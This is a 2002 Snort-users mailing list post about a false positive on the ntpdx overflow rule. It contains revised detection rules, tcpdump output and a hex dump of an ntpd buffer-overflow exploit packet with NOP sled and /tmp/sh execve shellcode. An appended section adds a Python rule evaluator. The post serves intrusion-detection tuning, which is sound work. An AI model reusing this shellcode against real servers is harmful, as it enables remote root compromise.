[Snort-users] ntpdx overflow attempt sig triggered by ntpdc query

james jamesh at ...3784...
Tue Dec 17 07:43:00 EST 2002


I was able to trigger this rule by doing "ntpdc -c peers <peer address>".
The ntpdc used is the current version of NTP & NTPD by David Mills.
The RON box we host set this off, and the researcher pointed out
to me that this was just an ntpdc query from him.

[**] [1:312:2] EXPLOIT ntpdx overflow attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
12/14-00:58:02.732689 mrtg:57985 -> tarpit:123
UDP TTL:64 TOS:0x0 ID:34983 IpLen:20 DgmLen:188 DF
Len: 168
[Xref => bugtraq 2540][Xref => arachnids 492]

alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx
overflow attempt"; dsize: >128; reference:arachnids,492;
reference:bugtraq,2540; classtype:attempted-admin; sid:312; rev:2;)

My hacked rule revisions, comments please

alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx overflow attempt"; \
dsize: >188; \
content:"|80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90 90|"; \
reference:arachnids,492; reference:bugtraq,2540; \
classtype:attempted-admin; sid:312; rev:3;)

or

alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx overflow attempt"; \
dsize: >188; \
content:"/tmp/sh"; \
reference:arachnids,492; reference:bugtraq,2540; \
classtype:attempted-admin; sid:312; rev:3;)


[root at ...7751...]# ntpdc -c peers mrtg

[root at ...7752... james]# tcpdump -v -E type host mrtg and udp port 123
tcpdump: listening on eth0
03:19:30.262385 tarpit.58596 > mrtg..ntp:  [len=160] v2 res2 strat 0
poll 2 prec 1 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig
0.000000000 rec -0.000000000 xmt -0.000000000 (DF) (ttl 64, id 31704,
len 188)
03:19:30.262442 tarpit.58596 > mrtg.ntp:  [len=160] v2 res2 strat 0 poll
2 prec 1 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig
0.000000000 rec -0.000000000 xmt -0.000000000 (DF) (ttl 63, id 31704,
len 188)
03:19:30.262970 mrtg.ntp > tarpit.58596:  [len=136] v2 -1s res2 strat 0
poll 2 prec 1 dist 4.000488 disp 16659.015945 ref
(unspec)@8061450.042957365 orig 38.000000000 rec +10622733.000000226 xmt
+83886042.254196226 (DF) [tos 0x10]  (ttl 64, id 0, len 164)
03:19:30.263110 mrtg.ntp > tarpit.58596:  [len=136] v2 -1s res2 strat 0
poll 2 prec 1 dist 4.000488 disp 16659.015945 ref
(unspec)@8061450.042957365 orig 38.000000000 rec +10622733.000000226 xmt
+83886042.254196226 (DF) [tos 0x10]  (ttl 63, id 0, len 164)

All other ntp query types I tried were less than len 188.

Exploit, from Whitehats:

This is a trace of the ntp exploit "ntpd-exp.c" found on
securityfocus.com which was written by babcia padlina ltd.

04/09-12:28:17.176237 192.0.0.10:1109 -> 192.0.0.1:123
UDP TTL:64 TOS:0x0 ID:60376 IpLen:20 DgmLen:540
Len: 520
16 02 00 01 00 00 00 00 00 00 01 36 73 74 72 61  ...........6stra
74 75 6D 3D 90 90 90 90 90 90 90 90 90 90 90 90  tum=............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
EB 1F 5E 89 76 08 31 C0 88 46 07 89 46 0C B0 0B  ..^.v.1..F..F...
89 F3 8D 4E 08 8D 56 0C CD 80 31 DB 89 D8 40 CD  ...N..V...1...@.
80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90  ....../tmp/sh...
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
77 F7 FF BF 77 F7 FF BF 90 90 90 90 90 90 90 90  w...w...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
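The false positive above comes down to what each rule option measures. As an added illustration (not code from the post or from Snort), here is a small Python evaluator for the two options these rules use, dsize and content, run over constructed payloads: a 160-byte stand-in for the ntpdc query (tcpdump's len=160; the 188 in the alert is the IP datagram length, 160 payload bytes plus 28 bytes of IPv4 and UDP headers), a 512-byte stand-in for the exploit trace (DgmLen 540) that carries only the "6stratum=" prefix and the 13 signature bytes from the dump inside 0x90 padding, and a 200-byte benign packet. The sample payload bytes, the mode-7 first byte and the sample names are assumptions; only the rules and the hex signature come from the post.

```python
# Rules from the post, joined onto single lines (Snort keeps one rule per
# line unless a line ends with a backslash).
ORIGINAL_RULE = (
    'alert udp $EXTERNAL_NET any -> $HOME_NET 123 '
    '(msg:"EXPLOIT ntpdx overflow attempt"; dsize: >128; '
    'reference:arachnids,492; reference:bugtraq,2540; '
    'classtype:attempted-admin; sid:312; rev:2;)'
)
HEX_CONTENT_RULE = (
    'alert udp $EXTERNAL_NET any -> $HOME_NET 123 '
    '(msg:"EXPLOIT ntpdx overflow attempt"; dsize: >188; '
    'content:"|80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90 90|"; '
    'reference:arachnids,492; reference:bugtraq,2540; '
    'classtype:attempted-admin; sid:312; rev:3;)'
)
STRING_CONTENT_RULE = HEX_CONTENT_RULE.replace(
    'content:"|80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90 90|"',
    'content:"/tmp/sh"',
)

IP_UDP_HEADERS = 20 + 8  # IPv4 header without options + UDP header, in bytes


def parse_options(rule):
    """Split the parenthesised option block into {keyword: [values]}."""
    body = rule[rule.index("(") + 1 : rule.rindex(")")]
    opts = {}
    for opt in body.split(";"):
        opt = opt.strip()
        if not opt:
            continue
        key, _, value = opt.partition(":")
        opts.setdefault(key.strip(), []).append(value.strip())
    return opts


def content_bytes(value):
    """Turn a Snort content string into bytes; text between | | is hex."""
    out = bytearray()
    for i, part in enumerate(value.strip('"').split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def dsize_ok(spec, payload_len):
    """Evaluate dsize:>N, dsize:<N or dsize:N against a payload length."""
    spec = spec.replace(" ", "")
    if spec.startswith(">"):
        return payload_len > int(spec[1:])
    if spec.startswith("<"):
        return payload_len < int(spec[1:])
    return payload_len == int(spec)


def rule_matches(rule, payload):
    """True when every dsize and content option holds for the payload.
    dsize is compared with the UDP payload length, as Snort does."""
    opts = parse_options(rule)
    if not all(dsize_ok(s, len(payload)) for s in opts.get("dsize", [])):
        return False
    return all(content_bytes(c) in payload for c in opts.get("content", []))


# Constructed stand-in for the ntpdc "peers" request: 160 payload bytes, the
# len=160 tcpdump shows (DgmLen 188 = 160 + 28). Only the first byte (0x17:
# NTP version 2, mode 7, the private mode ntpdc uses) is meaningful; the
# real request layout is not reproduced.
NTPDC_QUERY = b"\x17" + b"\x00" * 159

# Constructed stand-in for the exploit trace: 512 payload bytes (DgmLen 540)
# with the "6stratum=" prefix and the 13 signature bytes from the hex dump
# embedded in 0x90 padding. Nothing else from the trace is reproduced.
SIGNATURE = bytes.fromhex("80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68")
EXPLOIT_LIKE = (
    b"\x16\x02\x00\x01" + b"\x00" * 6 + b"\x016stratum="
    + b"\x90" * 200 + SIGNATURE
)
EXPLOIT_LIKE += b"\x90" * (512 - len(EXPLOIT_LIKE))

# Constructed large but benign packet: 200 bytes, no signature, to show that
# a dsize-only rule still misfires on anything big.
BIG_BENIGN = b"\x17" + b"\x00" * 199

RULES = {"rev2 dsize only": ORIGINAL_RULE,
         "rev3 hex content": HEX_CONTENT_RULE,
         "rev3 /tmp/sh": STRING_CONTENT_RULE}
SAMPLES = {"ntpdc peers query": NTPDC_QUERY,
           "exploit-like": EXPLOIT_LIKE,
           "big benign": BIG_BENIGN}


def evaluate(rules=RULES, samples=SAMPLES):
    """Return {rule name: {sample name: matched}} for the whole matrix."""
    return {r: {s: rule_matches(rule, p) for s, p in samples.items()}
            for r, rule in rules.items()}


if __name__ == "__main__":
    for name, p in SAMPLES.items():
        print(f"{name}: payload {len(p)} bytes, "
              f"IP datagram {len(p) + IP_UDP_HEADERS} bytes")
    for name, row in evaluate().items():
        print(name, row)
```

Because Snort's dsize compares the UDP payload rather than the IP datagram, dsize:>188 rejects the 160-byte query with more margin than the post's "len 188" figure suggests; it is the content option that keeps a merely large NTP packet from firing, as the 200-byte benign sample shows.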